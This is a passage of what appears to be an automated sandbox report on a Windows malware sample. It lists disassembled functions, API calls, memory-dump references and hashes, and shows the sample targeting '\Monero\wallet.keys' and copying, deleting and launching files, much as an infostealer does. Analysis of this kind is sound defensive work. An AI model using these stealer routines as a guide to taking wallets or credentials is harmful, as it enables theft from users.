                    • Opcode Fuzzy Hash: c418c491b281641586fed287784b349a63fe2ee70b7dfe1dea5b3d57aefd0a3b
                    • Instruction Fuzzy Hash: 9041D271C101089AEB14FBA1C891BDDBB74AF10304F50496FE116B6191DFBC6A5ACFA9
                    Function 00479E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                    Download Yara Rule
                    APIs
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00479F41
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$AllocLocal
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 4171519190-1096346117
                    • Opcode ID: 8801dc95ad90ccebb616d518643c663084db372c3f01567a11cd8a71615912a6
                    • Instruction ID: 6c3e8f3df84a1a876bde7f14585e1aba85a190e5601eb19cb8303ed41722e5ed
                    • Opcode Fuzzy Hash: 8801dc95ad90ccebb616d518643c663084db372c3f01567a11cd8a71615912a6
                    • Instruction Fuzzy Hash: 81615270900248AFDB14FFA5CC95FED7775AF44304F00841AF90A5B191EBBC6A15CB56
                    Function 004840B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,0123D880,00000000,00020119,?), ref: 004840F4
                    • RegQueryValueExA.ADVAPI32(?,0123E3B8,00000000,00000000,00000000,000000FF), ref: 00484118
                    • RegCloseKey.ADVAPI32(?), ref: 00484122
                    • lstrcat.KERNEL32(?,00000000), ref: 00484147
                    • lstrcat.KERNEL32(?,0123E130), ref: 0048415B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseOpenQueryValue
                    • String ID:
                    • API String ID: 690832082-0
                    • Opcode ID: ff825339333d0afb8825567ccc9b01b68fa380ec3792336978026a6f49de6ee9
                    • Instruction ID: 6f4dea2adf1394992b6cb75e4aa6c1249e345dfb928b5e8d6b408592f2409ff4
                    • Opcode Fuzzy Hash: ff825339333d0afb8825567ccc9b01b68fa380ec3792336978026a6f49de6ee9
                    • Instruction Fuzzy Hash: 774187B6D001087BDB14FBE0DC46FFE737DAB88304F408A5DB61956181EA795BC88B92
                    Function 00487E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487E37
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00487E3E
                    • RegOpenKeyExA.ADVAPI32(80000002,0122C540,00000000,00020119,?), ref: 00487E5E
                    • RegQueryValueExA.ADVAPI32(?,0123D960,00000000,00000000,000000FF,000000FF), ref: 00487E7F
                    • RegCloseKey.ADVAPI32(?), ref: 00487E92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: f4fadb6d3e731b5234ac414ccd7e53943f963fa8f02436acccfbf02e2a98feae
                    • Instruction ID: 395210cb7b00f703fa3c10765d5ff77899ed5d0f77d278b1d8dcf0d60de38417
                    • Opcode Fuzzy Hash: f4fadb6d3e731b5234ac414ccd7e53943f963fa8f02436acccfbf02e2a98feae
                    • Instruction Fuzzy Hash: 71118CB1A44205EBD700DFD4DD59FBFBBB9EB04B00F20465AF605A7280D77858018BA2
                    Function 00489260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                    Download Yara Rule
                    APIs
                    • StrStrA.SHLWAPI(0123E0A0,?,?,?,0048140C,?,0123E0A0,00000000), ref: 0048926C
                    • lstrcpyn.KERNEL32(006BAB88,0123E0A0,0123E0A0,?,0048140C,?,0123E0A0), ref: 00489290
                    • lstrlen.KERNEL32(?,?,0048140C,?,0123E0A0), ref: 004892A7
                    • wsprintfA.USER32 ref: 004892C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpynlstrlenwsprintf
                    • String ID: %s%s
                    • API String ID: 1206339513-3252725368
                    • Opcode ID: db2ddbc0f3803dd0773b863ff21b2de78811a149bfefa31aa2d4c947beae9745
                    • Instruction ID: ade12047d49ec16142079e79ff349ce2d526d60f3c08eab9abea82262e99e2bd
                    • Opcode Fuzzy Hash: db2ddbc0f3803dd0773b863ff21b2de78811a149bfefa31aa2d4c947beae9745
                    • Instruction Fuzzy Hash: 68011EB5500108FFCB04DFECC998EAE7BBAEB44350F148648F9099B300C635AE80DB95
                    Function 004712A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004712B4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 004712BB
                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004712D7
                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004712F5
                    • RegCloseKey.ADVAPI32(?), ref: 004712FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: cf6d9036ce1eff8a13677519e6179d62cb43cd8a8a0bec070514430646846a0d
                    • Instruction ID: 252718de77c326162cd5f7b0f3908403d9e1cfa78d9ebc9430491b78ac4b67ef
                    • Opcode Fuzzy Hash: cf6d9036ce1eff8a13677519e6179d62cb43cd8a8a0bec070514430646846a0d
                    • Instruction Fuzzy Hash: D60131F9A40208BBDB00DFE4DC49FAEB7BDEB48701F008299FA0597280DA749A418F51
                    Function 0048C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: String___crt$Type
                    • String ID:
                    • API String ID: 2109742289-3916222277
                    • Opcode ID: aa65c7912cf7d29ed0fdf8454787d5b3d55b6bcf72ea1716163b533f88ad41b4
                    • Instruction ID: ebe8bf36303019e9beeee53e23645fa19f4e126c8360d2e1166d2201a75dc433
                    • Opcode Fuzzy Hash: aa65c7912cf7d29ed0fdf8454787d5b3d55b6bcf72ea1716163b533f88ad41b4
                    • Instruction Fuzzy Hash: FA4128B150075C5EDB21AB248DC4FFF7BE89F05308F1448EEE98A86182D2799A458F78
                    Function 00486630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00486663
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00486726
                    • ExitProcess.KERNEL32 ref: 00486755
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                    • String ID: <
                    • API String ID: 1148417306-4251816714
                    • Opcode ID: bce197add49273dd42ffbcd4df3ab1733c5e36b25c943b11706168b06ba53206
                    • Instruction ID: aebbd7c8278ad27288c4f635b91afe39de2c6b899d8e3c59d9e29790f3a40fa2
                    • Opcode Fuzzy Hash: bce197add49273dd42ffbcd4df3ab1733c5e36b25c943b11706168b06ba53206
                    • Instruction Fuzzy Hash: FA314DF1801218AADB14FB91DC91BDD7778AF04304F80559EF20566191DFB86B89CF6A
                    Function 004887C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00490E28,00000000,?), ref: 0048882F
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00488836
                    • wsprintfA.USER32 ref: 00488850
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                    • String ID: %dx%d
                    • API String ID: 1695172769-2206825331
                    • Opcode ID: e2a582261eeca50a4f1f93a384fdb9d1b0a225c4f031073236184f83bbb345c8
                    • Instruction ID: 75f4060d866df39a49b2399239ab9442a0f51fcbf014a942fed93075b3f33f1c
                    • Opcode Fuzzy Hash: e2a582261eeca50a4f1f93a384fdb9d1b0a225c4f031073236184f83bbb345c8
                    • Instruction Fuzzy Hash: FF216DF1A40208AFDB00DFD4DD49FAEBBB9FB48700F104219F605A7680C779A900CBA5
                    Function 00488D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0048951E,00000000), ref: 00488D5B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00488D62
                    • wsprintfW.USER32 ref: 00488D78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesswsprintf
                    • String ID: %hs
                    • API String ID: 769748085-2783943728
                    • Opcode ID: b7b9d6b7cebd46ee4bf166386c7372f8bb800e41940652e2e4728a89a0fe2f45
                    • Instruction ID: 34134da81248140181aeb7a4fa53f56592a3f7e3116884f2f94f182295505579
                    • Opcode Fuzzy Hash: b7b9d6b7cebd46ee4bf166386c7372f8bb800e41940652e2e4728a89a0fe2f45
                    • Instruction Fuzzy Hash: B6E086B4A40208BFC700DBD4DC0DE5977BCEB04701F000254FD0987640D9715E408B56
                    Function 0047A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0123A250,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 00488B86
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047A2E1
                    • lstrlen.KERNEL32(00000000,00000000), ref: 0047A3FF
                    • lstrlen.KERNEL32(00000000), ref: 0047A6BC
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                    • DeleteFileA.KERNEL32(00000000), ref: 0047A743
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 679296f508632343cb8462a6d2e40ba384b029e712a21f4756a4b9a74033fbb5
                    • Instruction ID: 083da783821a49411c6cc8b97341e9c8b0f6ee616210dd508b334f5d4c27d108
                    • Opcode Fuzzy Hash: 679296f508632343cb8462a6d2e40ba384b029e712a21f4756a4b9a74033fbb5
                    • Instruction Fuzzy Hash: 44E1E3B28101189AEB04FBA5DC91EEE7338AF14304F50895FF51672091EF7C6A59CB7A
                    Function 0047D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
